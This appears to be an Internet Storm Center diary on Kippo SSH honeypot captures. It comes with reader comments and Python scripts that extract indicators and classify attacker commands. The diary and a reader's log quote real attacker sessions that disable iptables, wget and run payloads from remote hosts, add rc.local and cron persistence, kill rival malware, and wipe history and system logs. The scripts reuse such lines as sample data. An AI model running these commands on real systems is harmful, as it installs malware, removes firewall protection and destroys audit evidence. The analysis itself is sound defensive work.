A number of my fellow Handlers have discussed Kippo [1], an SSH honeypot that records adversarial behaviour, be it human or machine. Normal activity against my set of Kippo honeypots is predictable in its randomness: a mixture of scanning and probing from known-bad IP ranges, from researchers and from behind Tor, plus would-be attackers manually typing commands from their jump boxes or home machines.
I'd normally offer up any captured binaries for further analysis, if the teams had the capacity for it, or run them through an automated sandbox like Cuckoo [5] to pick out the more obvious indicators of compromise or further leads to research (especially hard-coded commands, IP addresses, domain names and the like).
Chris Mohan --- Internet Storm Center Handler on Duty

Recorded commands by Kippo

service iptables stop
wget hxxp://x.x.x.x:8889/badfile1
chmod u+x badfile1
./ badfile1 &
cd /tmp
tmp# wget hxxp://x.x.x.x:8889/badfile2
chmod u+x badfile2
./ badfile2 &
bash: ./ badfile2: command not found
/tmp# cd /tmp
/tmp# echo "cd /root/">>/etc/rc.local
cd /root/>>/etc/rc.local
/tmp# echo "./ badfile1&">>/etc/rc.local
./ badfile1&>>/etc/rc.local
/tmp# echo "./ badfile2&">>/etc/rc.local
./ux badfile2&>>/etc/rc.local
/tmp# echo "/etc/init.d/iptables stop">>/etc/rc.local
/etc/init.d/iptables stop>>/etc/rc.local
[2] File hash 1 (MD5 0601aa569d59175733db947f17919bb7): https://www.virustotal.com/en/file/22ec5b35a3b99b6d1562becb18505d7820cbcfeeb1a9882fb7fc4629f74fbd14/analysis/
[4] http://sourceforge.net/projects/hfs/

Chris (ISC Handler), Nov 10th 2014
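The diary mentions running captured binaries through a sandbox to pick out the obvious indicators (hard-coded commands, IP addresses, domain names). As an added example, not part of the diary and not Cuckoo's code, here is the quick static triage a handler would do before, or instead of, a sandbox run: pull printable strings from the file the way `strings` does, then sift them for IPs, URLs, domains and embedded shell commands. The blob is constructed for the example (ELF magic, binary noise, RFC 5737 TEST-NET addresses and a reserved example domain); nothing in it comes from the samples discussed on this page, and the `COMMAND_MARKERS` list is a simple heuristic, not anything Kippo or Cuckoo ships.

```python
import re
import string

# Constructed sample: a fake ELF-like blob with embedded strings of the kind a
# sandbox or `strings` run would surface. Addresses are RFC 5737 TEST-NET, the
# domain is a reserved example name; nothing here is from a real sample.
SAMPLE_BLOB = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 9
    + b"\x8a\x13\xf0\x00"                         # binary noise
    + b"wget http://192.0.2.10:8889/badfile1\x00"  # download stage
    + b"/etc/init.d/iptables stop\x00"             # disables the host firewall
    + b"\x01\x02\x03"
    + b"nameserver 8.8.8.8\x00"
    + b"cnc.example.com\x00"                       # hard-coded C2 host (constructed)
    + b"ab\x00"                                    # too short to count as a string
    + b"echo \"./badfile1&\" >> /etc/rc.local\x00" # boot persistence
    + b"\xff\xfe" * 8
)

# Printable ASCII minus control whitespace: what `strings` treats as text.
PRINTABLE = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")

IPV4_RE = re.compile(r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b")
URL_RE = re.compile(r"\bhttps?://[^\s\"'<>]+")
# Dotted names whose last label is alphabetic; the lookbehind keeps path
# components such as /etc/rc.local or /etc/init.d from being read as domains.
DOMAIN_RE = re.compile(r"(?<![/\w.-])(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)
# Heuristic tokens that mark an embedded shell command rather than a bare indicator.
COMMAND_MARKERS = ("wget ", "curl ", "chmod ", "/etc/init.d/", "iptables",
                   ">>", "killall", "nohup ")


def is_elf(blob: bytes) -> bool:
    """True if the file carries the ELF magic (what Kippo usually catches on Linux)."""
    return blob[:4] == b"\x7fELF"


def extract_strings(blob: bytes, min_len: int = 4) -> list:
    """Return runs of printable ASCII of at least min_len bytes (like `strings -n`)."""
    out, run = [], bytearray()
    for b in blob:
        if b in PRINTABLE:
            run.append(b)
        else:
            if len(run) >= min_len:
                out.append(run.decode("ascii"))
            run = bytearray()
    if len(run) >= min_len:
        out.append(run.decode("ascii"))
    return out


def extract_iocs(blob: bytes) -> dict:
    """Static triage of a captured binary: strings -> IPs, URLs, domains, embedded commands."""
    iocs = {"ips": set(), "urls": set(), "domains": set(), "commands": []}
    for s in extract_strings(blob):
        iocs["urls"].update(URL_RE.findall(s))
        iocs["ips"].update(IPV4_RE.findall(s))
        iocs["domains"].update(d.lower() for d in DOMAIN_RE.findall(s))
        if any(marker in s for marker in COMMAND_MARKERS):
            iocs["commands"].append(s)
    # Sets become sorted lists so the report is stable and diffable across samples.
    return {k: sorted(v) if isinstance(v, set) else v for k, v in iocs.items()}


if __name__ == "__main__":
    print("ELF:", is_elf(SAMPLE_BLOB))
    for key, values in extract_iocs(SAMPLE_BLOB).items():
        print(f"{key}:")
        for v in values:
            print("   ", v)
```

On a real capture, feed `open(path, "rb").read()` instead of `SAMPLE_BLOB`; the command-marker list and the domain pattern will both produce false positives on packed or stripped samples, which is exactly the point at which a sandbox run earns its keep.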
Nov 10th 2014
I tested it on my machines. I don't have the iptables service (I still have a firewall).
I have rigorous firewall rules (but unfortunately outgoing traffic on 80/443 is allowed to everyone). Password authentication is turned off (and sometimes it is on only for nontrivial usernames). I think that some simple rules can cut off ~97% of threats.
Anonymous

Nov 11th 2014
Hi Chris,
I have been seeing similar actions on my own Kippo honeypot (an example of the log is below). From the little analysis I have performed on the files that the scripted attack attempted to pull to my Kippo machine, it looks like it attempts to download and execute a malicious file exploiting a Linux vulnerability. Not sure which one; as I said, I haven't really looked into it enough. The md5sums of the files are below. If you want more, let me know and I can provide you with the logs that I have been collecting since early October. I've also taken out the domain for privacy reasons but can provide it if you wish.
Kind Regards,
Daniel Parker

2014-11-11 05:18:01+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,5792,122.225.97.69] executing command "/etc/init.d/iptables stop
echo "nameserver 8.8.8.8" >> /etc/resolv.conf
echo "nameserver 8.8.4.4" >> /etc/resolv.conf
apt-get -y install wget
yum -y install wget
chmod 7777 / etc
killall -9 .IptabLes
killall -9 nfsd4
killall -9 profild.key
cd /etc;rm -rf dir fake.cfg
killall -9 nfsd
killall -9 DDosl
killall -9 lengchao32
killall -9 b26
killall -9 khelper
killall -9 Bill
killall -9 n26
killall -9 007
killall -9 codelove
killall -9 32
killall -9 m32
killall -9 m64
killall -9 64
killall -9 83BOT
killall -9 82BOT
killall -9 dos64
killall -9 dos32
killall -9 new6
killall -9 new4
killall -9 node24
killall -9 mimi
killall -9 nodeJR-1
killall -9 freeBSD
killall -9 ksapdd
killall -9 106
killall -9 09
killall -9 xsw
killall -9 syslogd
killall -9 skysapdd
killall -9 cupsddd
killall -9 ksapd
killall -9 atddd
killall -9 xfsdxd
killall -9 sfewfesfs
killall -9 gfhjrtfyhuf
killall -9 rewgtf3er4t
killall -9 fdsfsfvff
killall -9 smarvtd
killall -9 whitptabil
killall -9 gdmorpen
cd /etc;chattr -i 66
cd /root; chmod 7777 / etc
killall -9 minerd
killall -9 syn
killall -9 joudckfr
killall -9 www
killall -9 log
killall -9 .IptabLes
killall -9 .IptabLex
killall -9 .Mm2
killall -9 acpid
killall -9 m64
killall -9 ./QQ
killall -9 aabb
killall -9 g3
killall -9 S99local
killall -9 3
killall -9 pm
killall -9 qweasd
killall -9 tangtang
killall -9 imap-login
killall -9 xudp
killall -9 sshpa
killall -9 008
killall -9 txma
killall -9 mrdos64.b00
killall -9 mrdos32.b00
killall -9 kkpklp
killall -9 kiilp
killall -9 xin1
killall -9 jibateng
killall -9 syscore.sh
killall -9 syscore.sh
killall -9 syscore.sh
killall -9 .mimeo
killall -9 .mimeo
killall -9 .mimeo
killall -9 .mimeop
killall -9 .task1
killall -9 .mimeop
killall -9 .IptabLes
killall -9 .IptabLex
killall -9 .IptabLes
killall -9 .IptabLex
killall -9 .IptabLes
killall -9 .IptabLex
killall -9 .IptabLes
killall -9 .IptabLex
cd /root;rm -rf dir nohup.out
cd /etc;rm -rf dir fake.cfg
cd /etc;rm -rf dir cupsddd.*
cd /etc;rm -rf dir atddd.*
cd /etc;rm -rf dir ksapdd.*
cd /etc;rm -rf dir kysapdd.*
cd /etc;rm -rf dir sksapdd.*
cd /etc;rm -rf dir skysapdd.*
cd /etc;rm -rf dir xfsdxd.*
cd /etc;rm -rf dir fake.cfg
cd /etc;rm -rf dir cupsdd.*
cd /etc;rm -rf dir atdd.*
cd /etc;rm -rf dir ksapd.*
cd /etc;rm -rf dir kysapd.*
cd /etc;rm -rf dir sksapd.*
cd /etc;rm -rf dir skysapd.*
cd /etc;rm -rf dir xfsdx.*
cd /etc;rm -rf dir sfewfesfs
cd /etc;rm -rf dir gfhjrtfyhuf
cd /etc;rm -rf dir rewgtf3er4t
cd /etc;rm -rf dir fdsfsfvff
cd /etc;rm -rf dir smarvtd
cd /etc;rm -rf dir whitptabil
cd /etc;rm -rf dir gdmorpen
cd /etc;rm -rf dir sfewfesfs.*
cd /etc;rm -rf dir gfhjrtfyhuf.*
cd /etc;rm -rf dir rewgtf3er4t.*
cd /etc;rm -rf dir fdsfsfvff.*
cd /etc;rm -rf dir smarvtd.*
cd /etc;rm -rf dir whitptabil.*
cd /etc;rm -rf dir gdmorpen.*
cd /etc;rm -rf dir nhgbhhj.*
cd /tmp;rm -rf dir 1.*
cd /tmp;rm -rf dir 2.*
cd /tmp;rm -rf dir 3.*
cd /tmp;rm -rf dir 4.*
cd /tmp;rm -rf dir 5.*
cd /tmp;rm -rf dir jdhe
cd /tmp;rm -rf dir jdhe.*
cd /var/spool/cron; rm -rf dir root.*
cd /var/spool/cron; rm -rf dir root
cd /var/spool/cron/crontabs; rm -rf dir root.*
cd /var/spool/cron/crontabs; rm -rf dir root
cd /var/spool/cron ;wget -c http://www.xxxxxxx.com:9162/root
cd /var/spool/cron/crontabs ;wget -c http://www.xxxxxxx.com:9162/root
yes|mv /tmp/root /var/spool/cron
yes|mv /tmp/root /var/spool/cron/crontabs
cd /tmp;wget -c http://www.xxxxxxx.com:9162/jdhe
cd /etc;wget -c http://www.xxxxxxx.com:9162/sfewfesfs
cd /etc;wget -c http://www.xxxxxxx.com:9162/gfhjrtfyhuf
cd /etc;wget -c http://www.xxxxxxx.com:9162/rewgtf3er4t
cd /etc;wget -c http://www.xxxxxxx.com:9162/fdsfsfvff
cd /etc;wget -c http://www.xxxxxxx.com:9162/smarvtd
cd /etc;wget -c http://www.xxxxxxx.com:9162/whitptabil
cd /etc;wget -c http://www.xxxxxxx.com:9162/gdmorpen
cd /etc;wget -c http://www.xxxxxxx.com:9162/nhgbhhj
cd /etc;wget -c http://www.xxxxxxx.com:9162/byv832
cd /tmp;chmod 7777 jdhe
cd /etc;chmod 7777 nhgbhhj
cd /etc;chmod 7777 byv832
cd /etc;chmod 7777 sfewfesfs
cd /etc;chmod 7777 gfhjrtfyhuf
cd /etc;chmod 7777 rewgtf3er4t
cd /etc;chmod 7777 fdsfsfvff
cd /etc;chmod 7777 smarvtd
cd /etc;chmod 7777 whitptabil
cd /etc;chmod 7777 gdmorpen
cd /tmp;chmod 7777 nhgbhhj
cd /tmp;chmod 7777 byv832
cd /tmp;chmod 7777 sfewfesfs
cd /tmp;chmod 7777 gfhjrtfyhuf
cd /tmp;chmod 7777 rewgtf3er4t
cd /tmp;chmod 7777 fdsfsfvff
cd /tmp;chmod 7777 smarvtd
cd /tmp;chmod 7777 whitptabil
cd /tmp;chmod 7777 gdmorpen
cd /tmp;./jdhe
nohup /etc/sfewfesfs > /dev/null 2>&1&
nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&
nohup /etc/rewgtf3er4t > /dev/null 2>&1&
nohup /etc/fdsfsfvff > /dev/null 2>&1&
nohup /etc/smarvtd > /dev/null 2>&1&
nohup /etc/whitptabil > /dev/null 2>&1&
nohup /etc/gdmorpen > /dev/null 2>&1&
nohup /etc/nhgbhhj > /dev/null 2>&1&
nohup /etc/byv832 > /dev/null 2>&1&
nohup /tmp/sfewfesfs > /dev/null 2>&1&
nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1&
nohup /tmp/rewgtf3er4t > /dev/null 2>&1&
nohup /tmp/fdsfsfvff > /dev/null 2>&1&
nohup /tmp/smarvtd > /dev/null 2>&1&
nohup /tmp/whitptabil > /dev/null 2>&1&
nohup /tmp/gdmorpen > /dev/null 2>&1&
nohup /tmp/nhgbhhj > /dev/null 2>&1&
nohup /tmp/byv832 > /dev/null 2>&1&
echo "cd /tmp;./sfewfesfs" >> /etc/rc.local
echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local
echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local
echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local
echo "cd /tmp;./smarvtd" >> /etc/rc.local
echo "cd /tmp;./whitptabil" >> /etc/rc.local
echo "cd /tmp;./gdmorpen" >> /etc/rc.local
echo "cd /etc;./sfewfesfs" >> /etc/rc.local
echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local
echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local
echo "cd /etc;./fdsfsfvff" >> /etc/rc.local
echo "cd /etc;./smarvtd" >> /etc/rc.local
echo "cd /etc;./whitptabil" >> /etc/rc.local
echo "cd /etc;./gdmorpen" >> /etc/rc.local
echo "unset MAILCHECK" >> /etc/profile
cd /etc;chattr +i sfewfesfs
rm -rf /root/.bash_history
touch /root/.bash_history
history -r
cd /var/log > dmesg
cd /var/log > auth.log
cd /var/log > alternatives.log
cd /var/log > boot.log
cd /var/log > btmp
cd /var/log > cron
cd /var/log > cups
cd /var/log > daemon.log
cd /var/log > dpkg.log
cd /var/log > faillog
cd /var/log > kern.log
cd /var/log > lastlog
cd /var/log > maillog
cd /var/log > user.log
cd /var/log > Xorg.x.log
cd /var/log > anaconda.log
cd /var/log > yum.log
cd /var/log > secure
cd /var/log > wtmp
cd /var/log > utmp
cd /var/log > messages
cd /var/log > spooler
cd /var/log > sudolog
cd /var/log > aculog
cd /var/log > access-log
cd /root > .bash_history
history -c"

md5sum
a3e718751e600c4e8503ac6836b84aba kippo/dl/20141111002520__tmp_1
e62089b51f3b485b891359accdb11bdc kippo/dl/20141111002520__tmp_2
585be83c1ee0ad009379369717ba988c kippo/dl/20141111002522__tmp_3
9a501b92f3cf548ba13478f1b5855c68 kippo/dl/20141111002523__tmp_4
ff1e9d1fc459dd83333fd94dbe36229a kippo/dl/20141111002523__tmp_5
f7556d9ede5d988400b1edbb1a172634 kippo/dl/20141111002524__tmp_byv832
048016c6e6848f92a29296b72df4d2d8 kippo/dl/20141111002536__tmp_fdsfsfvff
9941a4dc930868a5739a8004de53a686 kippo/dl/20141111002548__tmp_gfhjrtfyhuf
18bcb1c192df95a4216946f0294135bf kippo/dl/20141111002558__tmp_rewgtf3er4t
090dae205e10bc21dad0a13cba11446d kippo/dl/20141111002614__tmp_root
8285f35183f0341b8dfe425b7348411d kippo/dl/20141111002618__tmp_sfewfesfs
9941a4dc930868a5739a8004de53a686 kippo/dl/20141111002643__tmp_smarvtd
dparker
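Both captures in this thread, the diary's short "recorded commands" and the much longer script in the comment above, follow the same pattern: turn off iptables, fetch payloads with wget, chmod and run them, append them to /etc/rc.local or drop a crontab, kill rival malware with killall -9, lock files with chattr +i, then wipe history and truncate /var/log. As an added example that is neither Kippo's code nor anything posted in the thread, here is a parser for Kippo's `executing command "..."` log records (the format is taken from the log above; the `CMD: ` prefix Kippo uses for interactive shell input is assumed) that splits the payload into individual commands and tags each one with the behaviour it represents, then rolls everything up into an IOC summary. The log excerpt is constructed: the source address is RFC 5737 TEST-NET-2 and the download host is a reserved example name standing in for the domain the poster redacted; the file names are the ones seen in the captures.

```python
import re

# Constructed Kippo log excerpt modelled on the record format in the captured log.
# The payload of an "executing command" record spans several lines, which is why
# the original looked like one run-on line once the newlines were flattened.
SAMPLE_LOG = '''\
2014-11-11 05:18:01+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,5792,198.51.100.7] executing command "/etc/init.d/iptables stop
echo "nameserver 8.8.8.8" >> /etc/resolv.conf
killall -9 minerd
killall -9 .IptabLes
cd /tmp;wget -c http://dl.example.com:9162/jdhe
cd /tmp;chmod 7777 jdhe
cd /tmp;./jdhe
nohup /etc/sfewfesfs > /dev/null 2>&1&
echo "cd /tmp;./jdhe" >> /etc/rc.local
cd /var/spool/cron ;wget -c http://dl.example.com:9162/root
cd /etc;chattr +i sfewfesfs
rm -rf /root/.bash_history
cd /var/log > auth.log
cd /var/log > wtmp
history -c"
2014-11-11 05:19:30+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,5793,198.51.100.7] CMD: uname -a
'''

# One record = timestamp, channel header with source IP, then either an exec
# request (payload may contain quotes and newlines, so it ends only where the
# next timestamped record or the end of the file begins) or an interactive CMD.
RECORD_RE = re.compile(
    r'^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d[+-]\d{4}) '
    r'\[SSHChannel session \(\d+\) on SSHService ssh-connection on '
    r'HoneyPotTransport,\d+,(?P<ip>[\d.]+)\] '
    r'(?:executing command "(?P<exec>.*?)"|CMD: (?P<cmd>[^\n]*))'
    r'(?=\n\d{4}-\d\d-\d\d \d\d:|\n?\Z)',
    re.M | re.S,
)

# Behaviour rules, in the order the captured scripts tend to run them. Named
# groups pull out the indicator worth keeping (URL, killed process, wiped log).
RULES = [
    ("download",        re.compile(r"\b(?:wget|curl)\b[^\n]*?(?P<url>https?://\S+)")),
    ("firewall_off",    re.compile(r"\biptables\s+stop\b")),
    ("resolv_conf",     re.compile(r">>\s*/etc/resolv\.conf\b")),
    ("kill_competitor", re.compile(r"\bkillall\s+-9\s+(?P<name>\S+)")),
    ("persistence",     re.compile(r">>\s*/etc/rc\.local\b|/var/spool/cron|\bcrontab\b")),
    ("execute",         re.compile(r"\bchmod\s+(?:[0-7]*7{3}\b|\S*\+x)|\bnohup\s|(?:^|;)\s*\./")),
    ("lock_file",       re.compile(r"\bchattr\s+\+i\b")),
    ("wipe_history",    re.compile(r"\.bash_history\b|\bhistory\s+-[cr]\b")),
    ("truncate_log",    re.compile(r"^cd\s+/var/log\s*>\s*(?P<log>\S+)$")),
]


def parse_kippo_log(text: str) -> list:
    """Return one dict per record: {'ts', 'ip', 'commands': [one command per line]}."""
    records = []
    for m in RECORD_RE.finditer(text):
        payload = m.group("exec") if m.group("exec") is not None else m.group("cmd")
        commands = [c.strip() for c in payload.splitlines() if c.strip()]
        records.append({"ts": m.group("ts"), "ip": m.group("ip"), "commands": commands})
    return records


def classify(cmd: str) -> dict:
    """Tag a single command with every matching behaviour and its extracted indicators."""
    result = {"cmd": cmd, "tags": []}
    for tag, rx in RULES:
        m = rx.search(cmd)
        if m:
            result["tags"].append(tag)
            result.update({k: v for k, v in m.groupdict().items() if v})
    return result


def triage(text: str) -> dict:
    """Parse a Kippo log and roll the classified commands up into an IOC summary."""
    summary = {"sources": set(), "urls": set(), "killed": set(),
               "truncated_logs": set(), "tags": set()}
    classified = []
    for rec in parse_kippo_log(text):
        summary["sources"].add(rec["ip"])
        for cmd in rec["commands"]:
            c = classify(cmd)
            classified.append(c)
            summary["tags"].update(c["tags"])
            if "url" in c:
                summary["urls"].add(c["url"])
            if "name" in c:
                summary["killed"].add(c["name"])
            if "log" in c:
                summary["truncated_logs"].add(c["log"])
    out = {k: sorted(v) for k, v in summary.items()}
    out["commands"] = classified
    return out


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_LOG), indent=2))
```

Pointed at a real kippo.log the URL list is what goes to the download analysis, the killall names are a ready-made process watchlist for the rest of the fleet, and the tag set tells you at a glance whether a session was a scripted drop like the ones above or a human poking around (a `CMD: uname -a` with no tags).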
Nov 11th 2014
This group is described quite heavily by MalwareMustDie (http://blog.malwaremustdie.org/)
A